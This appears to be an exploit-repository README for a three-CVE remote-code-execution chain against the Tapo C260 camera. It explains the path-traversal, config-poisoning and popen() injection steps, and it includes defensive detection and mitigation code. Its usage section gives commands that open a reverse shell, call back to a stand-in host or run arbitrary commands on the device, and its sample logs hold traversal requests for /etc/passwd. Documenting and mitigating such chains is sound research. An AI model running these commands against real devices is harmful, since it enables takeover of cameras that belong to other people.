## https://sploitus.com/exploit?id=25DE60F3-D53C-5F5C-9C45-E27FA387E1AA
# Tapo C260 RCE Chain (CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

Proof-of-concept exploit chain for TP-Link Tapo C260 IP camera achieving **unauthenticated-to-root RCE** by chaining three vulnerabilities discovered by [Eugene Lim (Spaceraccoon)](https://spaceraccoon.dev).

## Credit

**All vulnerability research and discovery by [Eugene Lim (@spaceraccoon)](https://spaceraccoon.dev/getting-shell-tapo-c260-webcam/).**

This repo is a PoC implementation based on his public writeup. If you find this useful, go buy his book:
[From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press)](https://nostarch.com/).

## Vulnerability Chain

| CVE | Type | Impact |
|-----|------|--------|
| CVE-2026-0651 | Path Traversal / Local File Disclosure | Read arbitrary files via `/%2e%2e%2f` in the HTTP GET handler |
| CVE-2026-0652 | Arbitrary Config Write | Guest-level users can write to any config path via JSON key manipulation in the cloud API |
| CVE-2026-0653 | Command Injection / Privilege Escalation | `set_region_code_handle` passes unsanitized `dev_name` config value to `popen()` |
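Because the CVE-2026-0651 primitive rides on a percent-encoded `..` in the request path, it leaves a recognizable trace in whatever HTTP access logs sit in front of the camera. The following detector is an added example, not code from this repository or from the original writeup: it percent-decodes each request path until stable (so double encoding is unwrapped) and flags any path with a `..` segment. The Apache-style log lines are constructed samples.

```python
"""Detect percent-encoded path traversal (e.g. /%2e%2e%2f) in HTTP access logs.

Added example, not part of the original PoC repository. The log format is a
constructed, Apache-style common log; adjust LOG_RE for a real deployment.
"""
import re
from urllib.parse import unquote

# Constructed sample lines: two benign requests and three traversal attempts
# (single-encoded, upper-case encoding, and double-encoded).
SAMPLE_LOG = """\
192.168.1.50 - - [10/Jan/2026:12:00:01 +0000] "GET /stream HTTP/1.1" 200 512
192.168.1.50 - - [10/Jan/2026:12:00:02 +0000] "GET /static/app.css HTTP/1.1" 200 2048
10.0.0.7 - - [10/Jan/2026:12:00:03 +0000] "GET /%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1" 200 1024
10.0.0.7 - - [10/Jan/2026:12:00:04 +0000] "GET /%2E%2E/%2E%2E/etc/shadow HTTP/1.1" 404 0
10.0.0.7 - - [10/Jan/2026:12:00:05 +0000] "GET /%252e%252e%252fetc/passwd HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %252e -> %2e -> '.' is caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(path: str) -> bool:
    """True if any path segment, after decoding, is '..' (backslashes are normalised to '/')."""
    decoded = fully_decode(path).replace("\\", "/")
    return any(seg == ".." for seg in decoded.split("/"))


def find_traversal_attempts(log_text: str) -> list:
    """Return one finding per log line whose request path contains a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # line does not match the expected log shape; skip it
        if is_traversal(m["path"]):
            hits.append({
                "ip": m["ip"],
                "path": m["path"],
                "decoded": fully_decode(m["path"]),
                "status": int(m["status"]),
            })
    return hits


if __name__ == "__main__":
    for h in find_traversal_attempts(SAMPLE_LOG):
        print(f"{h['ip']} -> {h['decoded']} (HTTP {h['status']})")
```

A 200 status on a decoded path that escapes the web root is the strongest signal; a 404 still shows someone probing. Note that a naive substring check for `../` would miss both the single- and the double-encoded forms above, which is why the decode loop runs before the segment test.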

### Kill Chain

```
LFD (read device config) --> Config Write (poison dev_name) --> Trigger region code handler --> popen() --> shell
```

## Requirements

- Python 3.8+
- Network access to the camera (for LFD) **or** a valid TP-Link cloud auth token (for RCE)
- Guest-level credentials are sufficient for the full chain

## Install

```bash
git clone https://github.com//tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt
```

## Usage

### Local File Disclosure (CVE-2026-0651)

Read arbitrary files from a camera on the local network:

```bash
python lfd.py --host 192.168.1.100 --token  --file /etc/passwd
```

### Full RCE Chain (CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

```bash
# Reverse shell
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id  \
  --cloud-token  \
  --lhost  \
  --lport 4444

# Callback only (curl ping)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id  \
  --cloud-token  \
  --callback http://your-server.com/pwned

# Custom command
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id  \
  --cloud-token  \
  --cmd "id > /tmp/pwned"
```

## How It Works

1. **Poison**: Sends a `setLedStatus` request with manipulated JSON keys that write a shell metacharacter payload into the `tp_manage/info/dev_name` config path on the device.

2. **Trigger**: Sends a `set_region_code` request. The handler reads `dev_name` from config and interpolates it into a `popen()` call without sanitization, executing the injected command.

3. **Shell**: The attacker receives a callback or reverse shell.
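The chain works because a user-controlled config value is accepted without an allowlist and then reaches a shell. The block below is an added example of the two controls that break it, not firmware code and not part of this PoC: an allowlist validator for `dev_name` applied at config-write time, a scanner that walks a config dump and reports any string value carrying shell metacharacters (useful for checking an exported device config), and a command builder that quotes every untrusted field with `shlex.quote` when a shell cannot be avoided. The `tp_manage/info/dev_name` path comes from the writeup; the allowlist, the `regiontool` binary name and both sample configs are assumptions made for the example.

```python
"""Mitigations for the dev_name -> popen() pattern (CVE-2026-0653).

Added example, not the device firmware or the PoC's code. The config layout
(tp_manage/info/dev_name) is from the writeup; the allowlist, the hypothetical
'regiontool' binary and the sample configs are constructed for illustration.
"""
import re
import shlex

# Allowlist for a device display name: letters, digits, space, dot, dash,
# underscore; 1..32 characters. Anything else is rejected at write time.
DEV_NAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,32}$")

# Characters that change how a POSIX shell interprets a command string.
SHELL_META = set(";&|`$(){}<>\n\"'\\*?[]~!#")


def validate_dev_name(name: str) -> bool:
    """Accept only names matching the allowlist; call this before storing the value."""
    return bool(DEV_NAME_RE.fullmatch(name))


def scan_config(config: dict, path: str = "") -> list:
    """Walk a nested config dict and return the paths of string values
    that contain shell metacharacters."""
    findings = []
    for key, value in config.items():
        here = f"{path}/{key}" if path else key
        if isinstance(value, dict):
            findings.extend(scan_config(value, here))
        elif isinstance(value, str) and SHELL_META.intersection(value):
            findings.append(here)
    return findings


def build_region_command(region_code: str, dev_name: str) -> str:
    """Build the command string with each untrusted field shell-quoted.
    Preferable still is subprocess.run([...]) with an argument list and no
    shell; 'regiontool' is a hypothetical binary name."""
    return " ".join(["regiontool", shlex.quote(region_code), shlex.quote(dev_name)])


# Constructed sample configs: one clean, one with a poisoned dev_name.
CLEAN_CONFIG = {"tp_manage": {"info": {"dev_name": "Living Room Cam", "model": "C260"}}}
POISONED_CONFIG = {"tp_manage": {"info": {"dev_name": "Cam; id", "model": "C260"}}}


if __name__ == "__main__":
    for label, cfg in (("clean", CLEAN_CONFIG), ("poisoned", POISONED_CONFIG)):
        print(label, "->", scan_config(cfg) or "no findings")
    print(build_region_command("US", POISONED_CONFIG["tp_manage"]["info"]["dev_name"]))
```

With the quoted form the poisoned name is passed to the tool as a single literal argument instead of terminating the command, and the validator would have refused to store it in the first place. The scanner is the check to run over a config read back from a device when you suspect the write primitive has already been used.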

## Affected Firmware

- TP-Link Tapo C260 (pre-patch firmware)
- Potentially other Tapo models sharing the same `/bin/main` omnibus binary

## Disclaimer

This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. The authors are not responsible for misuse. Always obtain explicit permission before testing against any device you do not own.

## References

- [Original Writeup (Spaceraccoon)](https://spaceraccoon.dev/getting-shell-tapo-c260-webcam/)
- [Kennedn's Tapo Protocol Research](https://github.com/kennedn)
- [TP-Link Security Advisory](https://www.tp-link.com/us/support/faq/)